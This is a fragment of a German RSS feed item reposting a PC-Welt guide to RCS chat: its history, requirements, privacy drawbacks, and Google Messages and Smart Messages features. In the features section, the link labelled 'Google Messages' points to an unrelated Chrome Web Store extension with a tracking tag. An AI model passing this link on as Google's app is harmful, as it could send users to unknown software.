data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<h2 class="wp-block-heading toc">Fazit</h2>



<p>Valide Messenger-Alternative Mit der richtigen App kann RCS-Chat eine echte Alternative zu Messengern wie Whatsapp, Signal, Telegram &amp; Co. sein. Die Bedienung ist der eines Messengers ähnlich, Funktionen wie Sprachnachrichten, Emojis, Anhänge und mehr sind auch vorhanden.</p>



<p>Zwar ist die Auswahl an RCS-fähigen Apps derzeit noch überschaubar. Mit der Zeit wird sich der neue Standard aber sicherlich durchsetzen, sodass mehr Apps ihn unterstützen. Dann gibt die einzigen Einschränkungen nur noch der Provider vor – ein Grund, den Mobilfunkvertrag mal wieder zu studieren und gegebenenfalls zu einem anderen Anbieter zu wechseln.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RCS – Diese Vorteile bietet der Nachfolger der SMS]]></title>
<description><![CDATA[Eines gleich vorneweg: Bei RCS handelt es sich nicht um eine App, über die Sie sich mit anderen unterhalten können. 



RCS ist ein infrastrukturbasierter Kommunikationsstandard, der unabhängig vom verwendeten Smartphone und dessen Betriebssystem funktioniert. Als Chat-App kommt dabei in der Rege...]]></description>
<link>https://tsecurity.de/de/2616151/windows-tipps/rcs-diese-vorteile-bietet-der-nachfolger-der-sms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2616151/windows-tipps/rcs-diese-vorteile-bietet-der-nachfolger-der-sms/</guid>
<pubDate>Sun, 16 Feb 2025 09:06:26 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Eines gleich vorneweg: </strong>Bei RCS handelt es sich nicht um eine App, über die Sie sich mit anderen unterhalten können. </p>



<p>RCS ist ein <strong>infrastrukturbasierter Kommunikationsstandard</strong>, der unabhängig vom verwendeten Smartphone und dessen Betriebssystem funktioniert. Als Chat-App kommt dabei in der Regel die App zum Einsatz, mit der Sie SMS schreiben und empfangen, also eine App, die eh schon auf Ihrem Smartphone installiert ist.</p>



<p>Ursprünglich noch <em>Rich Communication Suite</em> genannt, fand RCS bereits im Jahr 2008 durch Nokia und den internationalen Branchenverband der GSM-Provider (GSMA) seinen Anfang. </p>



<p>In Deutschland wurde der Standard erstmals 2012 von Vodafone, ein Jahr später dann von der Telekom eingeführt.</p>



<p>Die weltweite Verbreitung stieg dann 2015 mit Googles Übernahme von Jibe Mobile, einem Unternehmen, welches sich auf Cloudkommunikation für Mobilfunkbetreiber unter anderem per RCS spezialisiert hat. </p>



<p>Seit 2021 ermöglicht Googles eigene Chat-App Google Messages <strong>RCS-Chats</strong>, seit 2024 beherrschen auch Apples iPhones mit iMessages ab iOS 18 den Kommunikationsstandard, was nun auch die Kommunikation zwischen den beiden Systemen möglich macht. Allerdings gibt es bei Apple derzeit noch keine Ende-zu-Ende-Verschlüsselung.</p>



<p><strong>Vorsicht: </strong><a href="https://www.pcwelt.de/article/2349452/whatsapp-groesste-fehler-benutzung.html" target="_blank" rel="noreferrer noopener">Die 8 größten Fehler bei der Whatsapp-Nutzung</a></p>



<h2 class="wp-block-heading toc">Voraussetzungen für RCS</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600018","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterst\u00fctzen. Um den Kommunikationsstandard zu nutzen, m\u00fcssen Sie ihn zuerst in den Einstellungen aktivieren.","alt":"Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterst\u00fctzen. Um den Kommunikationsstandard zu nutzen, m\u00fcssen Sie ihn zuerst in den Einstellungen aktivieren."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?quality=50&amp;strip=all" alt="Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren." class="wp-image-2600018" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?resize=234%2C300&amp;quality=50&amp;strip=all 234w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?resize=768%2C985&amp;quality=50&amp;strip=all 768w" width="800" height="1026" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Um mit einem Chatpartner per RCS zu kommunizieren, verwenden Sie normalerweise die App, mit der Sie auch SMS und MMS verschicken, also beispielsweise <strong>Google Messages</strong> oder <strong>Apple iMessage</strong>. </p>



<p>Dabei ist zu beachten, dass beide Chatpartner eine RCS-fähige App nutzen müssen, sonst verläuft die Unterhaltung wie bisher per SMS. Sind die Voraussetzungen jedoch gegeben, bietet der RCS-Chat im Vergleich zu einer SMS-Unterhaltung viele Vorteile und kann durchaus mit einem Chat per Whatsapp &amp; Co. mithalten. </p>



<p>Wer beispielsweise viel Wert auf Sicherheit legt, der sollte wissen, dass RCS das Adressbuch des Anwenders nicht mit dem Provider zwecks Datenabgleich teilt, und die Chats sind Ende-zu-Ende-verschlüsselt. </p>



<p>Außerdem kann es sein, dass Google beziehungsweise <a href="https://docs.jibemobile.com/?hl=de" target="_blank" rel="noreferrer noopener">Jibe Mobile</a> Ihnen von Zeit zu Zeit eine SMS schickt, über die Sie zur Sicherheit Ihre Telefonnummer bestätigen müssen.</p>



<p>Aber auch hinsichtlich der Bedienung bieten RCS-Chats viele nützliche Funktionen, die Sie von Ihrem Lieblings-Messenger kennen, die aber per SMS nicht möglich sind: </p>



<p>So sehen Sie beispielsweise, wenn Ihr Gegenüber schreibt, Sie können Lesebestätigungen einrichten, Gruppenchats führen und Thread-Antworten abgeben. Außerdem können Sie Sprachnachrichten, hochaufgelöste Fotos sowie Videos verschicken. </p>



<p>Allerdings hängt die Verfügbarkeit mancher Funktionen – etwa der Versand von Multimediadateien – vom Provider ab. Beispielsweise lässt Vodafone den Versand von Fotos und Videos per RCS (wie auch per MMS) nicht zu. </p>



<p>Überprüfen Sie hier also, welche Konditionen für RCS-Chats Ihr Vertrag enthält. In Deutschland unterstützen prinzipiell die Telekom, Vodafone und O2 RCS-Chats.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600026","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: \u00dcber das Pluszeichen f\u00fcgen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Au\u00dferdem d\u00fcrfen Sie bestimmen, wann Sie den Post abschicken.","alt":"\u00dcber das Pluszeichen f\u00fcgen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Au\u00dferdem d\u00fcrfen Sie bestimmen, wann Sie den Post abschicken."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?quality=50&amp;strip=all&amp;w=775" alt="Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken." class="wp-image-2600026" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=194%2C300&amp;quality=50&amp;strip=all 194w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=768%2C1188&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=775%2C1200&amp;quality=50&amp;strip=all 775w" width="775" height="1199" sizes="(max-width: 775px) 100vw, 775px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Aber auch die verwendete App muss die theoretisch möglichen Funktionen unterstützen, was derzeit leider noch nicht bei vielen SMS-Apps der Fall ist. </p>



<p>Gegebenenfalls müssen Sie die RCS-Chats in der App auch erst manuell aktivieren. In Google Messages tippen Sie dazu auf Ihr Profilbild und auf „Messages-Einstellungen“. Tippen Sie dann auf den ersten Eintrag „RCS-Chats“ (alternativ „Chatfunktionen“), und legen Sie den Schieberegler bei „RSC-Chats aktivieren“ um. </p>



<p>Hat Ihr Chatpartner RCS ebenfalls aktiviert, laufen Ihre Gespräche künftig allesamt über RCS.</p>



<p><strong>Wichtig:</strong> Haben Sie Verbindungsprobleme bei Ihren RCS-Chats, überprüfen Sie, ob Sie die neuesten App-Versionen von Google Messages und den Google Carrier Services installiert haben. Ist Ihr Smartphone mit zwei SIM-Steckplätzen ausgestattet, ist zu beachten, dass RCS-Chats derzeit nur für die Standard-SIM beziehungsweise die für Anrufe bevorzugte SIM verfügbar sind.</p>



<p><strong>Tipp: </strong><a href="https://www.pcwelt.de/article/2318115/beste-ki-smartphones.html" target="_blank" rel="noreferrer noopener">Diese Smartphones haben bereits künstliche Intelligenz an Bord</a></p>



<h2 class="wp-block-heading toc">Nachteile von RCS-Chat</h2>



<p>Der RCS-Chat hat aber natürlich nicht nur Vorteile. So verwendet Google Informationen wie Ihre Telefonnummer, die Gerätekennung Ihres Smartphones und die SIM-Kartennummer, um sicherzustellen, dass die Nachrichten auch korrekt zugestellt werden. </p>



<p>Die Daten bleiben etwa einen Monat lang gespeichert, sodass Sie auch dann mit RCS verbunden bleiben, wenn Sie vorübergehend offline sind.</p>



<p>Auch prüft Google regelmäßig alle Ihre Kontakte darauf, ob diese RCS-Chats nutzen können. Dazu werden die Daten über Googles RCS-Infrastruktur übertragen, und es können auch andere Serviceanbieter beteiligt sein.</p>



<p>Da manche Messenger es mit dem Datenschutz jedoch auch nicht so genau nehmen, liegt es an Ihnen als Anwender, ob Sie Ihre Daten gegen Komfort eintauschen möchten.</p>



<p><strong>Gleiches gilt für eventuelle Kosten: </strong>RCS-Nachrichten werden immer per WLAN und über die mobilen Daten verschickt. Befinden Sie sich gerade nicht in einem kostenlosen WLAN, können dabei je nach Mobilfunkvertrag Kosten anfallen. In der Regel enthalten moderne Tarifverträge jedoch eine SMS-Flatrate.</p>



<h2 class="wp-block-heading toc">RCS-Chat: Funktionen im Überblick</h2>



<p>Für unseren Ratgeber haben wir uns die App <a href="https://chromewebstore.google.com/detail/top-best-extension/cpmbdnkbpaabapidllalnfopojfimbno?utm_source=s-gp-3045" target="_blank" rel="noreferrer noopener">Google Messages</a> näher angesehen. Sie bietet in den Einstellungen einige nützliche Funktionen, die Sie per Schieberegler aktivieren oder deaktivieren.</p>



<p>Beispielsweise richten Sie darin die Lesebestätigung ein, die Ihren Chatpartnern mitteilt, wenn Sie deren Nachricht gelesen haben. Sie legen darin auch fest, dass eine Nachricht zusätzlich per SMS/MMS geschickt wird, falls sie nicht per RCS zugestellt werden konnte.</p>



<p>Hier ist jedoch zu beachten, dass, falls der Provider keinen Versand von Multimediadateien per RCS erlaubt, dies in der Regel auch per MMS nicht funktioniert.</p>



<p>In den Einstellungen bestimmen Sie ferner, in welchem Format Anhänge zur Sicherheit gesendet werden sollen (als MMS oder als SMS mit Link), wie groß Dateien sein dürfen, die über mobile Daten heruntergeladen werden (und ob überhaupt) und ob dies auch bei Roaming erlaubt sein soll.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600028","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Die Funktion \u201eFotomoji\u201c macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen d\u00fcrfen. Dabei arbeitet die App-KI selbstst\u00e4ndig und zeigt Ihnen potenzielle Motive an.","alt":"Die Funktion \u201eFotomoji\u201c macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen d\u00fcrfen. Dabei arbeitet die App-KI selbstst\u00e4ndig und zeigt Ihnen potenzielle Motive an."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?quality=50&amp;strip=all&amp;w=680" alt="Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an." class="wp-image-2600028" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=170%2C300&amp;quality=50&amp;strip=all 170w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=768%2C1356&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=680%2C1200&amp;quality=50&amp;strip=all 680w" width="680" height="1200" sizes="(max-width: 680px) 100vw, 680px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Aber auch bei der Bedienung an sich hat RCS über Google Messages einiges zu bieten, was Sie auch bei Whatsapp &amp; Co. finden: Zum Erstellen einer Nachricht tippen Sie Ihren Text beispielsweise wie gehabt in die Eingabezeile, die zur Bestätigung „RCS-Nachricht“ enthält. </p>



<p>Zum Abschicken verwenden Sie das blaue Dreieck in der Zeile. Über den Smiley fügen Sie animierte und statische Emojis, Sticker und GIFs hinzu. Eine Besonderheit sind hier die „Fotomojis“: Über den Reiter können Sie Bilder in Sticker verwandeln. </p>



<p>Dazu tippen Sie auf die „Erstellen“-Schaltfläche und navigieren zu einem Foto. Per KI bestimmt das Programm selbstständig mögliche Motive, also Personen, Gegenstände etc., von denen Sie das gewünschte per Fingertipp auswählen und versenden. <strong>Fotomojis </strong>lassen sich auch abspeichern, sodass Sie sie später noch einmal verwenden können.</p>



<p><strong>Die integrierte KI kann aber noch mehr: </strong>Möchten Sie einen geschriebenen, aber noch nicht gesendeten Text umformulieren, tippen Sie auf die spitze Klammer links daneben, dann auf das Plussymbol und „Magische Textvorschläge“.</p>



<p>Nun bietet Ihnen die KI Alternativen zu Ihrem Text, deren Stil Sie noch mit „Cool“, „Begeistert“ oder „Formell“ beeinflussen können. Wählen Sie anschließend den gewünschten Text aus, und schicken Sie ihn ab.</p>



<p><strong>Übrigens: </strong>In einem Chat verraten Ihnen kleine Symbole, in welchem Status sich eine Nachricht gerade befindet – also wie bei Whatsapp. Eine Stoppuhr bedeutet dabei, die Nachricht wird gesendet, ein Häkchen, die Nachricht wurde verschickt, zwei Häkchen, die Nachricht ist beim Empfänger angekommen, und zwei farbige Häkchen, die Nachricht wurde vom Empfänger gelesen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600035","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Auch Sprachnachrichten sind in RCS-Chats m\u00f6glich. Sie starten sie \u00fcber das Frequenzsymbol, nach dem Beenden d\u00fcrfen Sie entscheiden, ob Sie die Aufnahme abschicken m\u00f6chten.","alt":"Auch Sprachnachrichten sind in RCS-Chats m\u00f6glich. Sie starten sie \u00fcber das Frequenzsymbol, nach dem Beenden d\u00fcrfen Sie entscheiden, ob Sie die Aufnahme abschicken m\u00f6chten."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?quality=50&amp;strip=all" alt="Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten." class="wp-image-2600035" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?resize=210%2C300&amp;quality=50&amp;strip=all 210w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?resize=768%2C1098&amp;quality=50&amp;strip=all 768w" width="800" height="1144" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Die bereits erwähnten Sprachnachrichten zeichnen Sie über das stilisierte Frequenzsymbol in der Eingabezeile rechts neben dem Smiley auf. Hier dürfen Sie Ihre Nachricht zusätzlich mit sogenannten Voice Moods versehen, Stimmungs-Emojis, die dann im Fenster Ihrer Nachricht eingeblendet werden. </p>



<p>Auch Reaktionen auf Nachrichten lassen sich per Emoji hinzufügen. Dazu tippen Sie länger auf eine Nachricht und wählen aus den eingeblendeten fünf Emojis das gewünschte aus, das mit einer kurzen Animation eingefügt wird. Sie dürfen auch andere Emojis und Fotomojis auswählen, dann allerdings ohne Animation.</p>



<h2 class="wp-block-heading toc">Google Messages am PC nutzen</h2>



<p>Genau wie Whatsapp &amp; Co. können Sie auch Google Messages am PC im Browser nutzen. <a href="https://messages.google.com/web/welcome" target="_blank" rel="noreferrer noopener">Rufen Sie dazu diese URL auf</a>, und melden Sie sich mit Ihrem Google-Konto an.</p>



<p>Zum Koppeln des Smartphones zeigt Ihnen die Webversion ein Symbol an, das Sie auf dem Smartphone in der geöffneten App antippen, um die Verbindung zu bestätigen. Anschließend sehen Sie alle Ihre Chats in einer Liste.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600041","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Wie bei Whatsapp gibt es auch f\u00fcr RCS-Chats die M\u00f6glichkeit, sie am PC zu f\u00fchren. Analog zu Whatsapp m\u00fcssen Sie daf\u00fcr auch Ihr Smartphone per QRCode mit dem PC koppeln.","alt":"Wie bei Whatsapp gibt es auch f\u00fcr RCS-Chats die M\u00f6glichkeit, sie am PC zu f\u00fchren. Analog zu Whatsapp m\u00fcssen Sie daf\u00fcr auch Ihr Smartphone per QRCode mit dem PC koppeln."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?quality=50&amp;strip=all" alt="Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln." class="wp-image-2600041" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?resize=295%2C300&amp;quality=50&amp;strip=all 295w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?resize=768%2C781&amp;quality=50&amp;strip=all 768w" width="800" height="814" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Über „Chat starten“ beginnen Sie ein neues Gespräch, ansonsten stehen Ihnen wie in der Smartphone-App Emojis, Sticker, GIFs und die Möglichkeit, Anhänge zu verschicken, zur Verfügung. Einstellungen wie Lesebestätigungen, akustische Benachrichtigungen beim Nachrichteneingang oder eine Schreibanzeige können Sie über die drei horizontalen Striche und „Einstellungen“ einrichten.</p>



<h2 class="wp-block-heading toc">Smart Messages</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600043","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages m\u00fcssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren.","alt":"Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages m\u00fcssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?quality=50&amp;strip=all&amp;w=523" alt="Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren." class="wp-image-2600043" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=131%2C300&amp;quality=50&amp;strip=all 131w, 